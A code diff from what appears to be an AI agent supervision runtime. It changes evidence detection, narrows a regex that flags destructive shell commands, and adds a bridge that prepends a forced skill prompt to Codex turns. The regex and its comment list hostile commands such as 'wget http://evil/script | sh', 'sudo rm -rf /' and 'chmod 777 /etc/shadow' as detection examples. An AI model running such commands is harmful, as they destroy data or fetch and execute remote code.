+ const start = text.indexOf('{');
153
+ if (start < 0) return null;
154
+ let depth = 0;
155
+ let inStr = false;
156
+ let strQuote = '';
157
+ let escape = false;
158
+ for (let i = start; i < text.length; i++) {
159
+ const ch = text[i];
160
+ if (inStr) {
161
+ if (escape) { escape = false; continue; }
162
+ if (ch === '\\') { escape = true; continue; }
163
+ if (ch === strQuote) inStr = false;
164
+ continue;
165
+ }
166
+ if (ch === '"' || ch === '\'') { inStr = true; strQuote = ch; continue; }
167
+ if (ch === '{') depth++;
168
+ else if (ch === '}') {
169
+ depth--;
170
+ if (depth === 0) {
171
+ try { return JSON.parse(text.slice(start, i + 1)); } catch { return null; }
172
+ }
173
+ }
174
+ }
175
+ return null;
176
+ }
177
+
178
+ function isVerificationShapedJson(obj) {
179
+ if (!obj || typeof obj !== 'object') return false;
180
+ if (obj.success === false || obj.ok === false) return false;
181
+ if ((obj.error || obj.errors) && obj.success !== true && obj.ok !== true && obj.verified !== true) return false;
182
+ if (obj.success === true || obj.ok === true || obj.verified === true) return true;
183
+ if (typeof obj.status === 'string' && /^(?:ok|success|passed|verified|active|running|ready|healthy)$/i.test(obj.status)) return true;
184
+ if ((obj.modelUsed || obj.model) && typeof obj.latencyMs === 'number' && obj.latencyMs > 0) return true;
185
+ if (typeof obj.statusCode === 'number' && obj.statusCode >= 200 && obj.statusCode < 300) return true;
186
+ if (typeof obj.status === 'number' && obj.status >= 200 && obj.status < 300) return true;
187
+ return false;
188
+ }
189
+
109
190
  function hasEvidence(event, text) {
110
191
  if (Array.isArray(event.evidence_refs) && event.evidence_refs.length > 0) return true;
111
192
  if (event.validation?.passed === true || event.validation?.severity === 'pass') return true;
112
193
  if (event.layer3?.pass === true) return true;
113
194
  if (event.metadata?.validated_output === true || event.metadata?.verified === true) return true;
114
- return MEASURABLE_EVIDENCE_RX.test(text || event.text_preview || '');
195
+ if (MEASURABLE_EVIDENCE_RX.test(text || event.text_preview || '')) return true;
196
+ const toolTexts = readToolResponseTexts(event);
197
+ for (const t of toolTexts) {
198
+ const json = extractFirstJsonObject(t);
199
+ if (json) {
200
+ if (isVerificationShapedJson(json)) return true;
201
+ continue;
202
+ }
203
+ if (MEASURABLE_EVIDENCE_RX.test(t)) return true;
204
+ }
205
+ return false;
115
206
  }
116
207
 
117
208
  function hasVerifyEvidence(event, text) {
@@ -170,7 +261,7 @@ function decisionFromSignals(highRisk, repairable, warnings, autoTrigger = []) {
170
261
 
171
262
  export function normalizeCoachEvent(input = {}) {
172
263
  const phase = phaseOrDefault(input.phase);
173
- const rawText = normalizeString(input.text || input.output || input.message || input.target || '');
264
+ const rawText = normalizeString(input.text || input.output || input.message || input.target || input.rawText || '');
174
265
  const metadata = redactedClone(input.metadata && typeof input.metadata === 'object' ? input.metadata : {});
175
266
  const record = {
176
267
  coach_event_id: normalizeString(input.coachEventId || input.coach_event_id) || `coach_${randomUUID().replace(/-/g, '')}`,
@@ -197,14 +288,60 @@ export function normalizeCoachEvent(input = {}) {
197
288
  metadata,
198
289
  };
199
290
  Object.defineProperty(record, 'rawText', { value: rawText, enumerable: false });
291
+ // AI-11803-NORMALIZE-TOOL-RESPONSE (2026-05-12) — preserve tool_response on
292
+ // the normalized record (non-enumerable) so hasEvidence can read it. The
293
+ // input shape comes from Claude Code PostToolUse hook payloads which place
294
+ // verification evidence in tool_response.stdout. Without this preservation,
295
+ // hasEvidence's tool-response branch had nothing to read on the normalized
296
+ // record and verification went undetected. Non-enumerable matches rawText's
297
+ // convention — these are operational fields, not part of the audit summary.
298
+ const toolResponse = input.tool_response || input.toolResponse || input.tool_result || input.toolResult || null;
299
+ if (toolResponse !== null) {
300
+ Object.defineProperty(record, 'tool_response', { value: toolResponse, enumerable: false });
301
+ }
200
302
  return record;
201
303
  }
202
304
 
203
- const DESTRUCTIVE_RX = /\b(?:rm\s+-[rRfF]+\S*|drop\s+(?:table|database|schema|collection|index)|git\s+(?:reset\s+--hard|push\s+--force|push\s+--delete)|sudo\s+|systemctl\s+(?:stop|disable|mask|kill)|kill\s+-[9K]|pkill\s+-[9K]|--no-verify|--no-gpg-sign|kubectl\s+(?:delete|scale\s+--replicas=0|rollout\s+undo)|docker\s+rm\s+-f|chmod\s+777|wget|curl.*\|\s*(?:ba)?sh)\b/i;
305
+ // AI-11803-DESTRUCTIVE-RX-NARROW (2026-05-12) — narrowed bare-word false-
306
+ // positives. Prior pattern matched `sudo\s+`, `wget`, `chmod 777` against any
307
+ // prose context, including audit findings, doctrine memos, and meta-discussion
308
+ // of destructive commands. The local downgrade hooks (Edit/Write probe-prefix
309
+ // for tool calls, intent-classifier + proposal-menu shape for output) catch
310
+ // most false-positives, but classifier work + audit-log noise still incur on
311
+ // every prose mention. This narrows the bare-word matches to require concrete
312
+ // shell-execution context:
313
+ // - `sudo` now requires a following alphabetic command token (sudo systemctl,
314
+ // sudo apt) — bare "sudo" word in prose like "use sudo carefully" no longer
315
+ // matches.
316
+ // - `wget` now requires a URL or `-O` flag immediately after, signaling an
317
+ // actual download invocation rather than meta-mention.
318
+ // - `chmod 777` now requires a path argument or wildcard, signaling actual
319
+ // permission change rather than discussion.
320
+ // Real destructive shapes (`sudo rm -rf /`, `wget http://evil/script | sh`,
321
+ // `chmod 777 /etc/shadow`) still match. Meta-discussion in prose ("use sudo
322
+ // to escalate", "wget is a download tool", "chmod 777 considered harmful")
323
+ // no longer triggers the regex.
324
+ // AI-11803-DESTRUCTIVE-RX-NARROW-FIX (2026-05-12) — removed trailing \b.
325
+ // URL/path patterns end on non-word boundaries (slash, dot, colon) which
326
+ // fails the trailing word-boundary anchor. The leading \b still prevents
327
+ // substring matches (yougetsudo, argument, etc.). Each alternative branch
328
+ // is structurally unambiguous so no trailing anchor is needed.
329
+ // wget: require URL-scheme, IP address, or short flag. "wget the tool" (prose
330
+ // where wget is followed by a normal English word) does NOT match.
331
+ const DESTRUCTIVE_RX = /\b(?:rm\s+-[rRfF]+\S*|drop\s+(?:table|database|schema|collection|index)|git\s+(?:reset\s+--hard|push\s+--force|push\s+--delete)|sudo\s+[a-zA-Z][a-zA-Z0-9_-]*|systemctl\s+(?:stop|disable|mask|kill)|kill\s+-[9K]|pkill\s+-[9K]|--no-verify|--no-gpg-sign|kubectl\s+(?:delete|scale\s+--replicas=0|rollout\s+undo)|docker\s+rm\s+-f|chmod\s+777\s+\S+|wget\s+(?:-[a-zA-Z][a-zA-Z0-9]*|https?:\/\/|ftp:\/\/|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|curl[^|\n]*\|\s*(?:ba)?sh)/i;
204
332
  const DEPLOY_RX = /\b(?:kubectl\s+(?:apply|set|rollout|delete|create|replace|scale)|helm\s+(?:upgrade|install|uninstall)|terraform\s+(?:apply|destroy)|docker\s+(?:push|build\s+.*--push))\b/i;
205
333
 
334
+ // AI-11803-COACH-NORMALIZE-DEFENSIVE (2026-05-12) — always normalize.
335
+ // Prior shortcut `event.phase ? event : normalizeCoachEvent(event)` skipped
336
+ // normalization for callers that pre-set phase but didn't initialize array
337
+ // fields (missing_skill_ids, evidence_refs, etc.), leading to a TypeError on
338
+ // `normalized.missing_skill_ids.length` later in this function. The shortcut
339
+ // saved no measurable work — normalization is O(n) on a small input — and it
340
+ // created a fragile API contract where the caller had to know which fields to
341
+ // pre-initialize. Always normalize. If the caller already normalized, the
342
+ // double-normalize is idempotent (string trims, array dedups).
206
343
  export function evaluateCoachEvent(event = {}) {
207
- const normalized = event.phase ? event : normalizeCoachEvent(event);
344
+ const normalized = normalizeCoachEvent(event);
208
345
  const text = normalized.rawText || normalized.text_preview || '';
209
346
  const highRisk = [];
210
347
  const repairable = [];
package/dist/runtime/codex-bridge.mjs CHANGED
@@ -13,7 +13,7 @@ const require = createRequire(import.meta.url);
13
13
  const { WebSocketServer, WebSocket } = require('ws');
14
14
 
15
15
  const HOME = homedir();
16
- const LOG_PATH = `${HOME}/.aria/runtime/logs/codex-bridge.log`;
16
+ const LOG_PATH = process.env.ARIA_CODEX_BRIDGE_LOG_PATH || `${HOME}/.aria/runtime/logs/codex-bridge.log`;
17
17
  const RUNTIME_BASE_URL = (process.env.ARIA_RUNTIME_URL || 'http://127.0.0.1:4319').replace(/\/+$/, '');
18
18
  const BRIDGE_PORT = Number(process.env.ARIA_CODEX_BRIDGE_PORT || '4320');
19
19
  const DOWNSTREAM_PORT = Number(process.env.ARIA_CODEX_DOWNSTREAM_PORT || '4321');
@@ -21,6 +21,36 @@ const BRIDGE_HOST = process.env.ARIA_CODEX_BRIDGE_HOST || '127.0.0.1';
21
21
  const DOWNSTREAM_URL = process.env.ARIA_CODEX_DOWNSTREAM_URL || `ws://${BRIDGE_HOST}:${DOWNSTREAM_PORT}`;
22
22
  const DOWNSTREAM_STARTUP_GRACE_MS = Number(process.env.ARIA_CODEX_DOWNSTREAM_STARTUP_GRACE_MS || '5000');
23
23
  const BRIDGE_WARNING_METHOD = 'guardianWarning';
24
+ const CODEX_FORCED_SKILLS = Object.freeze([
25
+ 'aria-cognition-autofire',
26
+ 'aria-first-class-operating-contract',
27
+ 'aria-cognition-batch',
28
+ 'aria-quality-audit',
29
+ 'aria-repo-doctrine',
30
+ 'aria-http-harness-client',
31
+ 'aria-harness-substrate-binding',
32
+ 'aria-axioms-first-principles',
33
+ 'never-guess',
34
+ 'tadabbur',
35
+ 'tadabbur-ops',
36
+ 'tafakkur',
37
+ 'qiyas-analogy',
38
+ 'forge-quality-rules',
39
+ 'aria-task-codex-executor',
40
+ 'aria-backend-architect',
41
+ 'aria-harness-no-stripping',
42
+ 'aria-readable-output',
43
+ 'aria-ledger-fleet-execution',
44
+ 'predictor',
45
+ 'aria-aristotle-pre-phase',
46
+ 'aria-aristotle-intra-phase',
47
+ 'aria-aristotle-post-phase',
48
+ 'mizan',
49
+ 'ghazali-8lens',
50
+ 'aria-noor-cognitives',
51
+ ]);
52
+
53
+ const CODEX_FORCED_SKILL_FLOOR = 50;
24
54
 
25
55
  let downstreamProcess = null;
26
56
  let downstreamProcessStarting = null;
@@ -126,6 +156,19 @@ async function postRuntime(pathname, body) {
126
156
  return parsed;
127
157
  }
128
158
 
159
+ function remoteCoachEnabled() {
160
+ return /^(?:1|true|yes|on)$/i.test(String(
161
+ process.env.ARIA_REMOTE_COACH_ENABLED ||
162
+ process.env.ARIA_RUNTIME_COACH_ENABLED ||
163
+ process.env.ARIA_COACH_REMOTE_ENABLED ||
164
+ ''
165
+ ));
166
+ }
167
+
168
+ function externalDownstreamEnabled() {
169
+ return /^(?:1|true|yes|on)$/i.test(String(process.env.ARIA_CODEX_BRIDGE_EXTERNAL_DOWNSTREAM || ''));
170
+ }
171
+
129
172
  function ensureTurnState(threadId, turnId) {
130
173
  const key = `${threadId}:${turnId}`;
131
174
  let state = turnState.get(key);
@@ -139,6 +182,7 @@ function ensureTurnState(threadId, turnId) {
139
182
  bufferedAgentNotifications: [],
140
183
  firstAgentItemId: null,
141
184
  preRecorded: false,
185
+ forcedSkillReceipt: null,
142
186
  traceId: `trace_${randomUUID()}`,
143
187
  };
144
188
  turnState.set(key, state);
@@ -170,6 +214,102 @@ function extractInputText(input) {
170
214
  return parts.join('\n\n').trim();
171
215
  }
172
216
 
217
+ function prependForcedPromptToInput(input, forcedPrompt, userText) {
218
+ const current = Array.isArray(input) ? input.map((item) => {
219
+ if (!item || typeof item !== 'object' || Array.isArray(item)) return item;
220
+ return { ...item };
221
+ }) : [];
222
+ const originalText = String(userText || extractInputText(current) || '').trim();
223
+ const bridgedText = [
224
+ '--- ARIA CODEX FORCED COGNITION PACKET ---',
225
+ forcedPrompt,
226
+ '--- /ARIA CODEX FORCED COGNITION PACKET ---',
227
+ '',
228
+ '--- CURRENT USER REQUEST ---',
229
+ originalText || '(no explicit user text)',
230
+ ].join('\n');
231
+
232
+ const textIndex = current.findIndex((item) => item && typeof item === 'object' && typeof item.text === 'string');
233
+ if (textIndex >= 0) {
234
+ current[textIndex] = {
235
+ ...current[textIndex],
236
+ text: bridgedText,
237
+ ariaOriginalText: current[textIndex].text,
238
+ };
239
+ return current;
240
+ }
241
+
242
+ return [
243
+ { type: 'text', text: bridgedText, ariaOriginalText: originalText },
244
+ ...current,
245
+ ];
246
+ }
247
+
248
+ async function buildForcedSkillPromptForTurn(threadId, turnId, userText, params = {}) {
249
+ const state = ensureTurnState(threadId, turnId);
250
+ const message = String(userText || 'codex turn start').trim();
251
+ const result = await postRuntime('/build-system-prompt', {
252
+ sessionId: `codex:${threadId}:${turnId}`,
253
+ surface: 'codex',
254
+ message,
255
+ requiredSkills: CODEX_FORCED_SKILLS,
256
+ allowOwnerBypass: true,
257
+ injection: {
258
+ harness: {
259
+ packet: {
260
+ harness: [
261
+ 'surface=codex-bridge',
262
+ 'namespace=live-codex-turn',
263
+ 'purpose=force skill firing before cognition, before tool use, during tool use, after tool use, QA correction, and learning integration',
264
+ ].join('\n'),
265
+ sessionId: `codex:${threadId}:${turnId}`,
266
+ threadId,
267
+ turnId,
268
+ traceId: state.traceId,
269
+ },
270
+ },
271
+ task: message,
272
+ docs: [
273
+ {
274
+ title: 'Codex bridge forced cognition contract',
275
+ content: 'Apply these loaded skill bodies as binding pre-cognition, intra-cognition, post-cognition, QA, correction, verification, and learning-loop instructions before answering or using tools.',
276
+ },
277
+ ],
278
+ files: {},
279
+ loadedAt: new Date().toISOString(),
280
+ },
281
+ metadata: {
282
+ threadId,
283
+ turnId,
284
+ traceId: state.traceId,
285
+ cwd: params.cwd || null,
286
+ bridge: 'codex',
287
+ },
288
+ });
289
+
290
+ const missingSkills = Array.isArray(result?.missingSkillIds) ? result.missingSkillIds : [];
291
+ const missingCookbooks = Array.isArray(result?.missingCookbooks) ? result.missingCookbooks : [];
292
+ const loadedSkillIds = Array.isArray(result?.loadedSkillIds) ? result.loadedSkillIds : [];
293
+ if (result?.ok !== true || typeof result?.prompt !== 'string' || loadedSkillIds.length < CODEX_FORCED_SKILL_FLOOR || missingSkills.length > 0 || missingCookbooks.length > 0) {
294
+ throw new Error(`forced skill prompt build failed: loaded=${loadedSkillIds.length} missingSkills=${missingSkills.join(',') || 'none'} missingCookbooks=${missingCookbooks.length}`);
295
+ }
296
+
297
+ state.forcedSkillReceipt = {
298
+ promptHash: createHash('sha256').update(result.prompt).digest('hex'),
299
+ promptChars: result.prompt.length,
300
+ loadedSkillIds,
301
+ loadedSkillHashes: Array.isArray(result.loadedSkillHashes) ? result.loadedSkillHashes : [],
302
+ loadedCookbooks: Array.isArray(result.loadedCookbooks) ? result.loadedCookbooks.map((cookbook) => ({
303
+ skillId: cookbook.skillId,
304
+ cookbookName: cookbook.cookbookName,
305
+ hash: cookbook.hash,
306
+ chars: cookbook.chars,
307
+ })) : [],
308
+ builtAt: new Date().toISOString(),
309
+ };
310
+ return result.prompt;
311
+ }
312
+
173
313
  function inferThreadId(params = {}) {
174
314
  return params.threadId || params.thread_id || params.turn?.threadId || params.turn?.thread_id || params.item?.threadId || params.item?.thread_id || null;
175
315
  }
@@ -479,6 +619,16 @@ async function checkActionAgainstRuntime(action, target, threadId, turnId, metad
479
619
 
480
620
  async function recordCoachPhaseForTurn(threadId, turnId, phase, patch = {}) {
481
621
  const state = ensureTurnState(threadId, turnId);
622
+ if (!remoteCoachEnabled()) {
623
+ return {
624
+ ok: true,
625
+ skipped: true,
626
+ permitted: true,
627
+ decision: 'allow',
628
+ phase,
629
+ reasons: ['remote_coach_disabled'],
630
+ };
631
+ }
482
632
  try {
483
633
  return await postRuntime('/coach/phase', {
484
634
  phase,
@@ -509,13 +659,24 @@ async function recordCoachPhaseForTurn(threadId, turnId, phase, patch = {}) {
509
659
  async function recordMizanPre(threadId, turnId) {
510
660
  const state = ensureTurnState(threadId, turnId);
511
661
  try {
662
+ const preEvidenceRefs = [
663
+ makeEvidenceRef('user_input', state.userText, { threadId, turnId, traceId: state.traceId }),
664
+ ...(state.forcedSkillReceipt
665
+ ? [makeEvidenceRef('codex_forced_skill_prompt', state.forcedSkillReceipt, { threadId, turnId, traceId: state.traceId })]
666
+ : []),
667
+ ];
512
668
  await recordCoachPhaseForTurn(threadId, turnId, 'pre_turn', {
513
669
  text: state.userText || 'codex turn start',
514
- evidenceRefs: [makeEvidenceRef('user_input', state.userText, { threadId, turnId, traceId: state.traceId })],
670
+ evidenceRefs: preEvidenceRefs,
671
+ metadata: { forced_skill_receipt: state.forcedSkillReceipt },
515
672
  });
516
673
  await recordCoachPhaseForTurn(threadId, turnId, 'pre_cognition', {
517
674
  text: state.userText || 'codex pre-cognition',
518
- evidenceRefs: [makeEvidenceRef('codex_pre_cognition_request', state.userText, { threadId, turnId, traceId: state.traceId })],
675
+ evidenceRefs: [
676
+ makeEvidenceRef('codex_pre_cognition_request', state.userText, { threadId, turnId, traceId: state.traceId }),
677
+ ...preEvidenceRefs.slice(1),
678
+ ],
679
+ metadata: { forced_skill_receipt: state.forcedSkillReceipt },
519
680
  });
520
681
  const result = await postRuntime('/mizan/pre', {
521
682
  sessionId: `codex:${threadId}:${turnId}`,
@@ -533,7 +694,8 @@ async function recordMizanPre(threadId, turnId) {
533
694
  platform: 'codex',
534
695
  userText: state.userText,
535
696
  traceId: state.traceId,
536
- evidenceRefs: [makeEvidenceRef('user_input', state.userText, { threadId, turnId, traceId: state.traceId })],
697
+ evidenceRefs: preEvidenceRefs,
698
+ forcedSkillReceipt: state.forcedSkillReceipt,
537
699
  },
538
700
  });
539
701
  state.preReceiptId = result?.receipt?.receiptId || null;
@@ -541,8 +703,9 @@ async function recordMizanPre(threadId, turnId) {
541
703
  text: state.userText || 'codex post-cognition',
542
704
  evidenceRefs: [
543
705
  makeEvidenceRef('mizan_pre_receipt', result?.receipt || null, { threadId, turnId, traceId: state.traceId }),
706
+ ...preEvidenceRefs.slice(1),
544
707
  ],
545
- metadata: { pre_receipt_id: state.preReceiptId },
708
+ metadata: { pre_receipt_id: state.preReceiptId, forced_skill_receipt: state.forcedSkillReceipt },
546
709
  });
547
710
  } catch (error) {
548
711
  log(`warn mizan/pre thread=${threadId} turn=${turnId} error="${error instanceof Error ? error.message : String(error)}"`);
@@ -824,6 +987,25 @@ async function releaseTurnOutput(upstream, notification) {
824
987
  }
825
988
 
826
989
  async function ensureDownstreamReady() {
990
+ if (externalDownstreamEnabled()) {
991
+ for (let attempt = 0; attempt < 50; attempt += 1) {
992
+ try {
993
+ await new Promise((resolvePromise, rejectPromise) => {
994
+ const socket = new WebSocket(DOWNSTREAM_URL);
995
+ socket.once('open', () => {
996
+ socket.terminate();
997
+ resolvePromise();
998
+ });
999
+ socket.once('error', rejectPromise);
1000
+ });
1001
+ return;
1002
+ } catch {
1003
+ await sleep(100);
1004
+ }
1005
+ }
1006
+ throw new Error(`external downstream codex app-server not reachable at ${DOWNSTREAM_URL}`);
1007
+ }
1008
+
827
1009
  if (downstreamProcess && !downstreamProcess.killed) return;
828
1010
  if (downstreamProcessStarting) {
829
1011
  await downstreamProcessStarting;
@@ -904,6 +1086,11 @@ async function startBridge() {
904
1086
  });
905
1087
 
906
1088
  wss.on('connection', async (upstream) => {
1089
+ const earlyUpstreamMessages = [];
1090
+ const earlyUpstreamMessageHandler = (data) => {
1091
+ earlyUpstreamMessages.push(data);
1092
+ };
1093
+ upstream.on('message', earlyUpstreamMessageHandler);
907
1094
  await ensureDownstreamReady();
908
1095
  const downstream = new WebSocket(DOWNSTREAM_URL);
909
1096
  const pendingDownstreamMessages = [];
@@ -916,9 +1103,45 @@ async function startBridge() {
916
1103
  pendingTurnStarts.set(String(message.id), {
917
1104
  threadId,
918
1105
  userText: extractInputText(params.input),
1106
+ forcedSkillReceipt: null,
919
1107
  });
920
1108
  }
921
1109
 
1110
+ async function forceSkillPromptOnTurnStart(message) {
1111
+ if (message?.method !== 'turn/start' || !message?.params?.threadId) return { ok: true, message };
1112
+ const params = message.params;
1113
+ const threadId = params.threadId;
1114
+ const turnId = params.turnId || params.turn_id || `pending-${message.id ?? Date.now()}`;
1115
+ const userText = extractInputText(params.input);
1116
+ const state = ensureTurnState(threadId, turnId);
1117
+ if (!state.userText && userText) state.userText = userText;
1118
+ try {
1119
+ const forcedPrompt = await buildForcedSkillPromptForTurn(threadId, turnId, userText, params);
1120
+ const pending = message?.id == null ? null : pendingTurnStarts.get(String(message.id));
1121
+ if (pending) pending.forcedSkillReceipt = state.forcedSkillReceipt;
1122
+ return {
1123
+ ok: true,
1124
+ message: {
1125
+ ...message,
1126
+ params: {
1127
+ ...params,
1128
+ input: prependForcedPromptToInput(params.input, forcedPrompt, userText),
1129
+ ariaForcedSkillIds: CODEX_FORCED_SKILLS,
1130
+ ariaForcedSkillPromptHash: state.forcedSkillReceipt?.promptHash || null,
1131
+ },
1132
+ },
1133
+ };
1134
+ } catch (error) {
1135
+ const reason = error instanceof Error ? error.message : String(error);
1136
+ log(`block turn/start thread=${threadId} reason="${reason}"`);
1137
+ return {
1138
+ ok: false,
1139
+ threadId,
1140
+ reason: formatCodexRecoveryBlock('codex-bridge-forced-skill-prompt', reason),
1141
+ };
1142
+ }
1143
+ }
1144
+
922
1145
  function takePendingTurnStart(threadId) {
923
1146
  for (const [requestId, pending] of pendingTurnStarts.entries()) {
924
1147
  if (pending.threadId === threadId) {
@@ -945,7 +1168,10 @@ async function startBridge() {
945
1168
  const turnId = turn?.id || result.turnId || result.turn_id;
946
1169
  if (!turnId) return;
947
1170
  pendingTurnStarts.delete(String(message.id));
948
- hydrateTurnState(pending.threadId, turnId, pending.userText);
1171
+ const state = ensureTurnState(pending.threadId, turnId);
1172
+ if (!state.userText && pending.userText) state.userText = pending.userText;
1173
+ if (pending.forcedSkillReceipt && !state.forcedSkillReceipt) state.forcedSkillReceipt = pending.forcedSkillReceipt;
1174
+ void recordMizanPreOnce(pending.threadId, turnId);
949
1175
  }
950
1176
 
951
1177
  function sendDownstream(payload) {
@@ -973,7 +1199,7 @@ async function startBridge() {
973
1199
  try { upstream.close(); } catch {}
974
1200
  });
975
1201
 
976
- upstream.on('message', async (data) => {
1202
+ async function handleUpstreamMessage(data) {
977
1203
  const raw = typeof data === 'string' ? data : data.toString();
978
1204
  let message;
979
1205
  try {
@@ -988,10 +1214,29 @@ async function startBridge() {
988
1214
  if (!message.params.approvalPolicy) {
989
1215
  message.params.approvalPolicy = 'untrusted';
990
1216
  }
1217
+ const forced = await forceSkillPromptOnTurnStart(message);
1218
+ if (!forced.ok) {
1219
+ safeSendJson(upstream, makeGuardianWarning(forced.threadId || message.params.threadId, forced.reason), 'forced skill prompt warning');
1220
+ safeSendJson(upstream, {
1221
+ id: message.id,
1222
+ error: {
1223
+ code: -32000,
1224
+ message: forced.reason,
1225
+ },
1226
+ }, 'forced skill prompt error');
1227
+ return;
1228
+ }
1229
+ message = forced.message;
991
1230
  }
992
1231
 
993
1232
  sendDownstream(JSON.stringify(message));
994
- });
1233
+ }
1234
+
1235
+ upstream.off('message', earlyUpstreamMessageHandler);
1236
+ upstream.on('message', handleUpstreamMessage);
1237
+ for (const earlyMessage of earlyUpstreamMessages.splice(0)) {
1238
+ void handleUpstreamMessage(earlyMessage);
1239
+ }
995
1240
 
996
1241
  downstream.on('message', async (data) => {
997
1242
  const raw = typeof data === 'string' ? data : data.toString();
@@ -1050,6 +1295,7 @@ async function startBridge() {
1050
1295
  if (threadId && turnId) {
1051
1296
  const pending = takePendingTurnStart(threadId);
1052
1297
  const state = ensureTurnState(threadId, turnId);
1298
+ if (pending?.forcedSkillReceipt && !state.forcedSkillReceipt) state.forcedSkillReceipt = pending.forcedSkillReceipt;
1053
1299
  if (!state.userText) {
1054
1300
  state.userText = message?.params?.turn?.input?.map?.((entry) => entry?.text).filter(Boolean).join('\n\n') || pending?.userText || '';
1055
1301
  }